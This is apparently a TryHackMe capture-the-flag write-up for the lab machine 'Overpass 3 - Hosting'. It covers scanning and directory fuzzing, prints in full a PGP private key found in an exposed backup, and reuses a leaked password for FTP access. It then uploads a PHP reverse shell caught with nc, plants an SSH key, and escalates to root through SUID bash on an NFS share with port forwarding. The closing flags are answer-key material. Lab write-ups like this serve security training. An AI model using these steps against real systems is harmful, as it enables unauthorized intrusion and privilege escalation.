THM Machine: Overpass 3 - Hosting
Task 1 Overpass3 - Adventures in Hosting

Overview
After Overpass's rocky start in infosec and the commercial failure of their password manager and subsequent hack, they've decided to try a new business venture.
Overpass has become a web hosting company! Unfortunately, they haven't learned from their past mistakes. Rumor has it, their main web server is extremely vulnerable.
let's Start Hacking!
Information Gathering
Machine IP : 10.10.96.246
Scanning
Nmap Scanning Report
$ sudo nmap -sCV -A -p 21,22,80 10.10.96.246
Nmap scan report for 10.10.96.246
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_ 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (94%), Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 200.00 ms 10.8.0.1
2 200.00 ms 10.10.96.246
Total Open Ports:
3
Port Number:
21
,22
,80
Services:
ftp
,ssh
,http
Services Versions:
vsftpd 3.0.3
,OpenSSH 8.0 (protocol 2.0)
,Apache httpd 2.4.37 ((centos))
Operating System:
Linux(Centos)
Enumeration
Three services are running on the target system. So now we can enumerate the services. let's start doing it.
HTTP Enumeration
As Target has an http
server running on the machine our first starting point is to look into the Target website so let's do it. Let's visit the website

Above is the main web page we can see there is nothing else just regular static pages containing some information about the overpass and nothing more.
As we could not find anything special on the site the next step is to start the Directory scanning for finding some hidden directories. Hidden Directories are those directories that are present o the site but we cannot see any of their references on the website.
ffuf Directory Scanning
$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://10.10.96.246/FUZZ -ic
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.96.246/FUZZ
:: Wordlist : FUZZ: directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 1770, Words: 443, Lines: 37]
backups [Status: 301, Size: 236, Words: 14, Lines: 8]
[Status: 200, Size: 1770, Words: 443, Lines: 37]
:: Progress: [87651/87651] :: Job [1/1] :: 209 req/sec :: Duration: [0:08:30] :: Errors: 9 ::
So we found one hidden directory name backups
so we can visit it

We can only see one file there named backup.zip
so let's download it and see what's in there

As we can see above there are two files in the backup.zip file.
priv.key
CustomerDetails.xlsx.gpg
When we use the file
command on it we see the following output

They show us that the first filepriv.key
is a PGP private key block. When I google it to know a little more about it so I came to know that is a private key used to decrypt the files that are encrypted using the GNU Privacy Guard (GnuPG) encryption.
And the other one is an encrypted file and as the name show that is about the overpass customers. As it is an encrypted file with the PGP cryptographic software so we cannot see the content of it without decrypting the file with a private key but luckily we have the Private Key
.
-----BEGIN PGP PRIVATE KEY BLOCK-----
lQOYBF+oX7cBCADhibQ/m0CUX0DKreNOMaBiG6YNrkaRd5XKFfZ8cO+JbE57Yuao
T3uhxN396ICsRBG7VGK03YZVwafMFxx0ItIEuV8n9nQ9K6WJg6od815J3UkkSMU4
TL6E+iGiAvYUtxwo2s/NqAdrUcAqoa9ImUxqHjJByNNpLbTcfKJKzZZEdVH6Iuo7
qLoKwNJLK427CpDqTFJmOLoRVH9XDSMaVaP5MT4qn18/iSJGpFJY/Qjv2RdgygiS
wYqtfhYzeg46nIKCrXSOU7P3/A9f2ncXgwzVdfQI6vYCzMU4mS1Qs9jMcDccHXfo
9N6fSkQK259M/l2GiyhYBJtFWa/01gqt8R7NABEBAAEAB/kBZ3IP00+bnNwyZtK7
ceOluLZX73XRAgWUtH5MWAelu17htcPp2FTUtP0Mz529dM8Hc4cJyTdE4WfCBYLP
1keob97/yLEAkHz/ViqA9TrpCs+hwjI4H4IwIb6D27DcgCdUucgBZ8JkEKY5nbgR
o6KuJnH5pt5qETbHCJ+aB52f33gdN8R/PA+NwKLBQoWqXsteBGXpjsqsGi/U6g1q
f58xjbQgVsiL+FqprXPOJnJdYSA5D4qfuZBM//LTXd5Y+BPmjHIQUkY2jzi4A7L/
AIy8lOt2IY4j4UQraZCowReJdU537Z0LZviiCYz49lw3qix+AJ5ciedeB2reDRm+
kGihBADtjhePeUmor5Y8H0wCJQDCv2ojtGXEIFEnF4lEd0moDd/39u9ikuhS3VEa
FhNKt3274kokAVLxfhHoFJ/CIVjiQ9MElU1tuL+TAARXoZx/AGnlmyRmw7tkQ4g6
lfVHs271JHoMWpLXnrM0Rs+NQtxOTkqC2i5s2PYrr4cv98TccwQA8wy+/ANGuuKT
rhR70895qALft4GyMFxlRLvSuKTnyPxSuuGMS0KmsATcVB5c3vTpaS5VbI7N9HCF
Y0GN7XSa7GbK/ozkDoIZzSreRewldoi2silffMb4P+dtxBkEqJh5xjZVAYHS8kqD
mrzvuO0GWmc96Ie1nOWfMIaVQdLwh78EAN02wNgpCAKi/iHqlSrEFRtkPOC1vumd
HS0D9wqNXlKjmyqFcKBRuD9mbYi+xzgpHqiIHoXONiRlAQWQ1kFaInUHOq+ScfOi
p/Ct7+29j2ZnGh0EDviLM3/l8ZOlJNK6NyO29kjD9UUjHHo74us9Rd/+7rsvx5NJ
CUgIXNHkz82PRAq0HlBhcmFkb3ggPHBhcmFkb3hAb3ZlcnBhc3MudGhtPokBVAQT
AQgAPhYhBEmCm76xALsmkvM80smucasxgLwIBQJfqF+3AhsDBQkDwmcABQsJCAcC
BhUKCQgLAgQWAgMBAh4BAheAAAoJEMmucasxgLwIn64H/RjHeS9Z1cMPDjqh0Nuy
XQcSIWXAlntz19zdIvieT0U2udbvM25m18vAF96mx6J6E++HogWgLeVhJDnNpv7y
NRQPatYSY42+kuSlqPJkH6Y84JSfqgicE+tcYujdtTVZpAOfJGp34KOyjtO2X7ZV
SZC/sSpLbTeLejWCF4tb5OnxTqE1wFXeN1I7nN9isQiii0jdTrNVmMUgksiZaX29
CoUA6RLkwAt136qx+nXOj79kKhR1kLwb11bkhlnVhk0cmvQhj47XUnpLNzMNSIZ4
OdIWEwfF73cHXPE1TiHsF09yIv5r46ar/XhHCmFs/ybh5ts+eR1O6bJXw1AR6Jjc
D56dA5gEX6hftwEIAMTb2GxUKa/xroSc7MuYSEBpSDaW6ZQCTx/D34V206/LGD3m
rBA846gyB0o0QNncytpv/1V9+YUIdX26/iwOZzaD+OxsJZ4RlKiResa0+1mtR6aq
L4Fg878fYDDv+f3r0XH70QmnU4k9+JdoZ0NP4uoYiUMx8xT6a2b8tinTCjrOkNbs
sWzC5dg4KDddFMGr2MOtc7wHKxzlFwv0o0X8g1YSkH5XSg6O02IM9WCrerxA96ki
gFWHONQDPj6SihAP4/fNuKWnvLW/R6OhTQxBemsGRxnEyIhu5v2M1JjBK1SzP+Gt
MO49oajGluIttjK+VAlCzM3WNx20MLWWVnv6eNsAEQEAAQAH/jE52FCeax44DS/U
HdJ7bfXNXeVor1f3i9mhnU8+e4jF/HXeLMCSuUrh17jSgDT6ZS9iOjMioTaG+vpJ
vC1AHMchESntkSqJsubEGjN+JiwyjGw8ukxb9hegvOj/2T+JrIIYOhlz4gu7l2Il
FU1buJ5ZLFnFL8fbJuhF4TdsMm6psHzvJA6sljkyoev6znwJoMhb22HyHNwNEDP2
6xcecvgeBbyimxd3inQEFzueOSz8jkTj5pCG6MT8T3eCBdL9q3qS3myja05qWmHh
bK+9pocqHbbbFlF+u5Tx8nWg3shAW46xdKr7chtBBpF8EfHBwf6yHsvXrdE/GRtq
mhOEoaEEANz1sI/GnSujE1TF1DslL6vUpuMuwkPdV4rRdKmqPMF5Z2929QC5ovOS
80HjURNLv9BvTJkG9ZjlydG+9lZvfsQE8etux3laXz8tU+Rsthr+TGbiNrT9ZyG+
TeeXO99eVU8XzTmUQlLtf48XLShLMJAuf08TYie3HANarnc9mjrXBADkE7p1yaDu
6rYN427RYZ9nc2u7Q2OKHLgIjp47f3tdyKhpyDTdQ2Jwt9D7CgvJLY5pX+rYLc3G
/DQ7A24BL6o0gJmNXNaEL/wbhC1QXGY4q+NaHAyW8H05mUMvHxYhRIx+pM47BAA6
EcUYn+ixrgKNjFfue44XImjG50BDv51VnQP/ZJv/qb4sFbWGIWemN9CLwRTn6WR6
HlOZ4YHvMbTuLtgA259geEoGiYn5+LSzZsd75LGvw3w18mYlyr7PHm9duHHGRoFW
731BahG4Y3o/n3TrMH8QPqQLOu4O3GOKXuOEu+zAd2/SAnlb7hrtEF99HudnfrBv
B38D/q9l8A70AWRBqIkBPAQYAQgAJhYhBEmCm76xALsmkvM80smucasxgLwIBQJf
qF+3AhsMBQkDwmcAAAoJEMmucasxgLwIGAMH/iDMt6lx/9GGo1USlxFCNfAvecDD
N3hUqajTt7V0n29NhXjcxA9Dy4ztXMQxQTpD6M4Oa8HZVEfH0oBpRLor3QRkVqF1
Aj7qgO6j7r2GkMwPiVlXQRW/dnhtNzvaS1ZR47R7YeFQuIIFiWnt+mamWrM3TN8x
5yeHVycXbFyRO121lKB0/q7f9dVFN8UY92F5cfMPUAOjM59P8Nsx3rFLUAhi7Fyo
5YeN91WwbAtRyc33YmwK/SpOVarOOdEvrGFK2z1Tq++RpqzuYFfnZ868NXJP+99Q
wR1fzkFAFjEZIO+bteZLEzr9BCUI7FAyQofXMggwiuyuw/Prcema52nhJvA=
=mr8q
-----END PGP PRIVATE KEY BLOCK-----
So we have the private key, now let's decrypt the file and see its content. To decrypt that file we have to use a package name gnupg
and we can install it using the following command.
Command: sudo apt install gnupg
When we install it then we have to use the command gpg
. When we do that they will create a directory in our system. After that, we have to import the Private Key to our gpg
directory and we can do this with the following command.
Command: gpg --import priv.key
This will add that private key and now we are able to decrypt the file with the following command
Command: gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx
This command decrypts the file and saves its content on the file CustomerDetails.xlsx
in our present working directory. If everything goes fine then we can see the following files in our directory.

Now when I use the file
command on the CustomerDetails.xlsx
file they will show us the following file type

Now this will become an Excel file so we can open it in Excel and see its content.

Above is the content that is in the file where we can see the Customer Name
, Username
, Password
and Credit Card Number
with CVC
numbers. But wait we see some of the names previously on the website main page Paradox
and MuirlandOracle
I wonder if username and password are also used in other services like ssh
and ftp
. After checking they are not used in ssh
but they work for ftp
service running on the server.
After successfully login to the ftp
server using the paradox
username and ShibesAreGreat123
as its password. we can use the ls
command to see what is in there. We see this is the website's root directory there we can see the Backups
directory index.html
,main.css
etc.

Now we can try to put a php
reverse shell and if the application supports a php file we could get the reverse shell back to our attacker machine. So we can put this PHP reverse shell by downloading it to our attacker machine and then edit the IP address with our IP address and also change the port number of our own choice.
Now we are ready to upload the shell.php
file to the target system. Connect to the target ftp server using the following command syntax
Syntax: ftp Target_IP_Here
password: ShibesAreGreat123
When we are connected to the ftp server using the following command to upload the shell to the target web directory
ftp> put shell.php
This will upload the shell.php
to the target system.
Note if your shell.php
the file is in another directory then give him the full PATH of that file
Exploitation
Now we upload the shell.php
file to the target system its time to get the connection but first start the listener on the system using the following command
$ nc -lvnp 4444
Where 4444
is the port number that is in the shell.php
. When you start it then just go to the link in your browser or you can use the following command to activate the shell.php
if the server accepts the php
files then we get the connection back to us.
$ curl http://Tareget_IP/shell.php
And we indeed got the connection back to our listener. if you use the id
command you will see you are login to the user apache
. Use the cd
command and press enter to go to its home directory there you will see the web flag
. Now we should upgrade the shell
Shell Upgrade
Currently our shell is very bad if by any chance we press CTRL + C
we will see our shell will close and also we cannot use any other command that changes the shell environment i.e you cannot use nano
or su
command because our current shell didn't have a better TTY
. We can fix it using the following commands.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
After that press Ctrl+z
to background the netcat
shell and go to your system native shell and then use the following command
$ stty raw -echo
Now use the fg
command to go back to the netcat
reverse shell and hit Enter Key
twice or use the reset
command. Now you have a better TTY
shell but if you have to upgrade that shell more so then again press Ctrl+z
to background the nc
terminal and then type the following command
$ echo $TERM
This command will show you some values like xterm-256color
remember that value and then use the following command
$ stty size
This command will show you some numbers like 20 120
so in this, the first number shows the rows and the second show the column so note both the value and use the fg
command to go back to your nc
shell and type the following command
$ export TERM=xterm-256color
$ stty rows 30 columns 120
Once you did that you should get the netcat
shell-like an ssh
shell.
Privilege Escalation
So we have the ftp credentials for the paradox
user so we can do local priv-escalation so use the following command to login into the paradox
user
$ su paradox
password: ShibesAreGreat123
So when we use the ls -al
command in the paradox
user home directory there we see the following result

There is a directory name .ssh
when we go there we see the following files there

There is only two file there one is authorized_keys
and the other is id_rsa.pub
so there is no ssh private key there so we can only connect to the ssh if we add our ssh public key in the authorized_keys
file. To do that first, we have to create an ssh key pair in our system using the following command
$ ssh-keygen -f rsa
This will create an ssh key pair in the .ssh
directory in the paradox
user home directory. so use the cd ~/.ssh/
command to go to that directory and there you will see two files one name is id.rsa
and the other is id.rsa.pub
so use the cat id.rsa.pub
command to see the content of that file and copy it. Now go to the netcat
reverse shell and use the following command to edit the authorized_keys
file
$ nano authorized_keys
And paste your public key there and now you can ssh to the target with the following command
$ ssh paradox@Target_IP
Now you got the ssh connection also. Now we can try to search common privilege escalation vector to do that we can use linpeas.sh
for this download inpeas.sh in your system and we can use scp
to copy that file in the system using the following command
$ scp ./linpeas.sh paradox@Target_IP:/tmp
This command will copy linpeas.sh
file in the target /tmp
directory using the paradox
ssh account so when we go there we can see the file.
So now we can run linpeas.sh
to get the privilege escalation vectors but first, we have to make linpeas.sh
in executable form using the following command
$ chmod +x linpeas.sh
And now we can run it using the following command.
$ ./linpeas.sh
As we can see from the linpeas.sh
result there is no root privilege escalation vector found but there is an NFS service running as we can see from the linpeas
result.

But we could not see any NFS
service on the Nmap scan. That means the NFS service is only running in localhost which means we cannot access it remotely. Well, we can access it but first, we have to do port forwarding. Port forwarding is a thing in which we can forward the local port on the private network or system to the remote system. We can do port forwarding using ssh
with the following command syntax.
syntax: ssh -L Localport:Local_IP:Remote_Port user@Target_IP
The NFS
service is running by the user James
and linpeas
also gives us a link about Missed configuration that maybe use to do privilege escalation so we can visit it to learn about it also.
After doing research from the link given us by linpeas
they tell us that if we mount that nfs
share on the our attacker system then we can copy /bin/bash
binary into the NFS
share we mount on our attacking system and if we change its permissions with SUID
bit set then if we see that binary on remote system we will see that binary have SUID`
bit set there also and we can run that SUID
bit set bash
binary to do privilege escalation.
Now let's do that theory into action so first we have to mount that share into the our attacking system but first we have to forward that port into our system using ssh
as we mentioned above. We can use the following command to do port forwarding using ssh
$ ssh -L 2049:127.0.0.1:2049 paradox@Target_IP
This command will forward the 2049
the port which is the NFS
Port to our system 2049 Port. I use the command rpcinfo -p
on the Target system to know about which port the target NFS server is running.
So now we can mount that share on our system using the following command
$ sudo mount -t nfs localhost:/ /mnt/nfs
if everything goes right we can successfully mount that share on our system. There we can get the user.txt
flag and also when we use ls -al
command there we can see there is a directory name .ssh
that has James
user ssh private key and we have read & write
permission so we can read the ssh key using cat
command and copy that key on our attacking system and change his permission using the command chmod 600 id.rsa
so that only we can read it and now we can ssh to the James
the user using its private key with the command ssh -i id.rsa james@Target_IP
. We have ssh access to the James user now lets try to get the root user to do that follow the following steps
Using
James
user copy the/bin/bash
binary to the home directory using the following command
$ cp /bin/bash /home/james
Now go to the mounting directory in your system where you mount the
James
NFS share
directory.
$ cd /mnt/nfs
When you use the
ls -al
command there you see thebash
binary but they have the normal permission there.

Now let try the theory to abuse the vulnerability that we discussed above we can change the permission to that file from our attacking system
$ chmod +s /mnt/nfs/bash
We can see from the James
account that the binary got the SUID
bit set, now we can get the root privileges with the following command
$ ./bash -p


So that how the nfs
vulnerability work. linpeas.sh
show us the link, we go there and learn about it and now using that we got the root privileges.
Flags
Web Flag A: thm{0ae72f7870c3687129f7a824194be09d
}
User Flag A: thm{3693fc86661faa21f16ac9508a43e1ae}
Root flag A: thm{a4f6adb70371a4bceb32988417456c44}
Last updated
Was this helpful?